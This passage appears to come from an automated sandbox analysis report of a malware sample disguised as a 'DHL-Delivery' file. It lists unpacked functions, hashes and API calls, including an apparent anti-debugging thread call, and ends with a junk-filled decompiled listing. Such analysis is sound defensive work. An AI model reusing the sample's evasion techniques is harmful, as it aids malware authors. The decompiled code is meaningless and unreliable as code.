                        • Instruction ID: 9cce90e04b2b24ee0df16cd3ad9fe22be3371abb5da52d6ef4812a41da5ec20f
                        • Opcode Fuzzy Hash: 06e0bb1e902619b11e5fc572afdea020058c42ce15d3c08e566af61c6af641e1
                        • Instruction Fuzzy Hash: D1516E5DEC4306B9DF3428684AB97FB02934F677F0FA9471ADCAA831C5E7268086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A128D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: e4ca1a591e629b5a5002ca43633ba03791c06b9998a68e9c6dd43324519e4fab
                        • Instruction ID: 2e742869117e499b0a72016081059b4f93d8054db94f7fd060114106a22d3ffd
                        • Opcode Fuzzy Hash: e4ca1a591e629b5a5002ca43633ba03791c06b9998a68e9c6dd43324519e4fab
                        • Instruction Fuzzy Hash: 3F51705DEC4306B9DF3428684AB97FB02934F677F0FA9471BDCAA831C5E7268086C552
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A12C5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185UNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: da32072eecd5c1a6b7344f85e827b91286cb17ab3f6b704aac0d9c8c6c7d5214
                        • Instruction ID: 1adac4aca1c5d92ed59302475138bc6d81c37f9498fb57732a3593bfaace186b
                        • Opcode Fuzzy Hash: da32072eecd5c1a6b7344f85e827b91286cb17ab3f6b704aac0d9c8c6c7d5214
                        • Instruction Fuzzy Hash: 17518F5DEC4306B9DF34686C49B97FA02934F677F0FA9461BDCAA831C5E7268086C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1309, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177UNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: 3faf5df9b4fdddc873848769e5e0f7ca115202888130175898bbbf49556573a3
                        • Instruction ID: 3b695e1f048f36f514e423b115a909c016c1d6b9cef4afbb7a806cba9a787cd0
                        • Opcode Fuzzy Hash: 3faf5df9b4fdddc873848769e5e0f7ca115202888130175898bbbf49556573a3
                        • Instruction Fuzzy Hash: D441D26DEC4306BDDF34286849B97FB02934F577F0F95421ADCAA830C5E7268087C512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1354, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167UNIQUE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4l?R$4l?R
                        • API String ID: 0-3666051665
                        • Opcode ID: 09ab7f8bca929ab28f6ebb336bf62a3f41959b8a5dfd15915a3689f7c7987ca8
                        • Instruction ID: 34afea03ebeff1ae3c1d9c2aed03e6f2e414d4658e11ec73f420c7c52ea3ef84
                        • Opcode Fuzzy Hash: 09ab7f8bca929ab28f6ebb336bf62a3f41959b8a5dfd15915a3689f7c7987ca8
                        • Instruction Fuzzy Hash: 60418B6DEC4306B9EF3428684A797FB12935F577B0FA9422ADCDA471C5E3268086C502
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1393, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157UNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: b03b0112255edace568b8b1e0fe35723fa84356bc0a4bb2c170c6506511d649d
                        • Instruction ID: 35b4ec1170e0af0ec7a2131c8d307066f4a7a0790181b574c28c60b7ed82a718
                        • Opcode Fuzzy Hash: b03b0112255edace568b8b1e0fe35723fa84356bc0a4bb2c170c6506511d649d
                        • Instruction Fuzzy Hash: 5B41BD6CAC4306B9EF2428684A7A7FB12535F577B0F954219DC9A471C6E3268046C542
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A13B6, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146UNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: a3233d948a49832606535ab61851a0f2cb1be62de44a23cd16bd14148373169b
                        • Instruction ID: 8dfa6a02fed18454f3f464b1f373db6b0c81144473e2f33dcb3c1cc7a789de86
                        • Opcode Fuzzy Hash: a3233d948a49832606535ab61851a0f2cb1be62de44a23cd16bd14148373169b
                        • Instruction Fuzzy Hash: 57418D6CEC4306B9EF3524684E797FB02535F577B0FA94219DCDA471C5E76680868A02
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A13DF, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140libraryUNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: 7af97763b70b76b06aa47ce6d6f7581ded3a62d45a87d3ee7c8fb330aefff511
                        • Instruction ID: 44cfc548077341a9242120eaf58c751960ab360b55ab67ed570283b3480feef7
                        • Opcode Fuzzy Hash: 7af97763b70b76b06aa47ce6d6f7581ded3a62d45a87d3ee7c8fb330aefff511
                        • Instruction Fuzzy Hash: 9741EE6CEC4306B8EF35242C4E793FA11534F577A0F99422ADC9A470C5E3364083CA02
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A141E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129UNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 3349790660-3666051665
                        • Opcode ID: 4ad2086d79d6d5a0747f2bdf7b8673c83cf9ec5b91c936bcf01c132c8cc50215
                        • Instruction ID: 171e4ef0279b6d62bd76386b41066a9bd886b8b9a8354d25771a484f4b889c85
                        • Opcode Fuzzy Hash: 4ad2086d79d6d5a0747f2bdf7b8673c83cf9ec5b91c936bcf01c132c8cc50215
                        • Instruction Fuzzy Hash: 2B31BCACEC4306B9EB3064784A7A7FA11931F67BE0F99422ADC9A871C5E3774042C652
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A145B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118UNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        • Opcode ID: 759a72a7b7fe8b0b82a082fbaddc5a2c18b5d8f17146fbcde0d1bd2a7ecfb40c
                        • Instruction ID: 2a8d0527e322b365693f6d0f60f900e7ea8f2bedb5e740ded74fc50564c68005
                        • Opcode Fuzzy Hash: 759a72a7b7fe8b0b82a082fbaddc5a2c18b5d8f17146fbcde0d1bd2a7ecfb40c
                        • Instruction Fuzzy Hash: 9231C0ACDC4342B9EF34646C497A7FA11931F27BE0F99422ADC9B831C5E3774046CA56
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1490, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105UNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        • Opcode ID: 31726190006797194cf927350ea51e29236db3efe473ab53f9e4b7097537116f
                        • Instruction ID: db172a2f8876cfba2d08c0cbba09eab1307eddaf598adca43f892f09977ccb00
                        • Opcode Fuzzy Hash: 31726190006797194cf927350ea51e29236db3efe473ab53f9e4b7097537116f
                        • Instruction Fuzzy Hash: F921CEAC9C4302B9EF31656C4A7A7EA11535F27BB0F98422EDC9B831C1E3764042CA52
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A14C7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93UNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        • Opcode ID: 74f7144c1b590bcacc30537c4a136681b0fb8e4edfc149ee0830df569945c869
                        • Instruction ID: e94d080421ef7f6183797fb7a2718e3cf0830baea4910d266464ca0f0afda94e
                        • Opcode Fuzzy Hash: 74f7144c1b590bcacc30537c4a136681b0fb8e4edfc149ee0830df569945c869
                        • Instruction Fuzzy Hash: BC219D6C9C4352B9EF35756C497A3EA11935F27BA0F98412EDC9A830C1E3664086CA56
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1506, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84UNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        • Opcode ID: f38a85c3e6cf3319bf9a781bfdf4745160350a0c995da3d2320a38159a855269
                        • Instruction ID: fc263e4dc7ae41c0d7e99d9f505f6c47821bf0b79701fb3d1922337f57e55939
                        • Opcode Fuzzy Hash: f38a85c3e6cf3319bf9a781bfdf4745160350a0c995da3d2320a38159a855269
                        • Instruction Fuzzy Hash: 2621AD7D9C4342B9EB3565BC497A3E911935F27BA0FA8412EDC5AC31C1E3634046CAA7
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A153C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72UNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID: 4l?R$4l?R
                        • API String ID: 560597551-3666051665
                        • Opcode ID: 1177c772a915fa73f945b9202df8b1e10dbd895bcc5e1516781a844460dad0af
                        • Instruction ID: a0a9ba0066261e84de63b4e67ab7760ac1474e9ab48a144e5037863e4a5b2399
                        • Opcode Fuzzy Hash: 1177c772a915fa73f945b9202df8b1e10dbd895bcc5e1516781a844460dad0af
                        • Instruction Fuzzy Hash: 9911B17C88434279EB31696C5D763E925535F2BFA0F54422EEC5A871C1E3734046CA97
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1578, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessTerminateThread
                        • String ID: 4l?R$4l?R
                        • API String ID: 1477408370-3666051665
                        • Opcode ID: e6688f045c0da76b80b9f039a1b35b44c20f9e6c6bb7fa36d90b2ae250cb4f40
                        • Instruction ID: 3de96e4deda12d0c849569a89e282faa61e85f098ca76610ddd08c4d4219d187
                        • Opcode Fuzzy Hash: e6688f045c0da76b80b9f039a1b35b44c20f9e6c6bb7fa36d90b2ae250cb4f40
                        • Instruction Fuzzy Hash: 0011E36D88934268E721657C49763D525532F37F70F94426DEC5A831C5E3634046C6A6
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00401350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: #100
                        • String ID: VB5!6&*
                        • API String ID: 1341478452-3593831657
                        • Opcode ID: 45cc8d9b83631728180a2a73a4a26a5c54453b835f9468abe9621ccd2783eec7
                        • Instruction ID: f554ee7f1eced4216a90dc2a3d560d8d5ed33a026773139143d352a13890dc7f
                        • Opcode Fuzzy Hash: 45cc8d9b83631728180a2a73a4a26a5c54453b835f9468abe9621ccd2783eec7
                        • Instruction Fuzzy Hash: 35D0AE4084E3E05EE353267648225423F764C67A0030F49E7D481DB4E3D05C6818D37B
                        Uniqueness

                        Uniqueness Score: 1.18%

                        Function 00401983, Relevance: 2.1, APIs: 1, Instructions: 887memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00401983(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t925;
				char _t928;
				intOrPtr* _t929;
				signed int _t930;
				signed int _t931;
				intOrPtr* _t958;
				void* _t975;
				void* _t981;
				void* _t985;
				void* _t989;
				void* _t990;
				intOrPtr _t1020;
				intOrPtr _t1047;
				void* _t1057;
				void* _t1116;
				void* _t1120;
				void* _t1126;
				void* _t1130;
				void* _t1131;
				void* _t1132;
				void* _t1151;
				signed short _t1172;
				signed int _t1177;
				signed int _t1178;
				void* _t1186;
				void* _t1188;
				void* _t1214;
				void* _t1247;
				void* _t1275;
				void* _t1296;
				void* _t1307;
				void* _t1310;

				_t1247 = __esi;
				_t990 = __ebx;
				asm("out 0x0, al");
				asm("aam 0xba");
				asm("stosd");
				asm("o16 in al, 0x0");
				asm("ror dl, 1");
				asm("rol byte [eax], cl");
				_t1186 = __edi + 1;
				asm("in eax, dx");
				asm("fiadd word [eax]");
				_t925 = _t1310;
				_t1130 = __edx + 1;
				if (_t1130 >= 0) goto L1;
				 *((char*)(_t1130 + 0x6b000700)) = 0;
				_pop(_t1057);
				asm("outsb");
				 *((intOrPtr*)(__ebx + 0x46)) =  *((intOrPtr*)(__ebx + 0x46)) + _t925 + 0x6200b4fc;
				_push(0);
				_t1131 = _t1130 + 1;
				asm("in al, 0xb3");
				 *((intOrPtr*)(__ebx - 0xff2b44)) =  *((intOrPtr*)(__ebx - 0xff2b44)) + _t1131;
				_t928 = _t1307 + 1;
				_t1132 = _t1131 + _t1057;
				asm("sbb [ecx], edi");
				asm("adc [ebp], ecx");
				 *[es:0x275e000d] = _t928;
				_t929 = _t928 - 1;
				 *_t929 =  *_t929 + _t1057;
				_t1188 = _t1186 + 2;
				_t930 = _t929 - 1;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
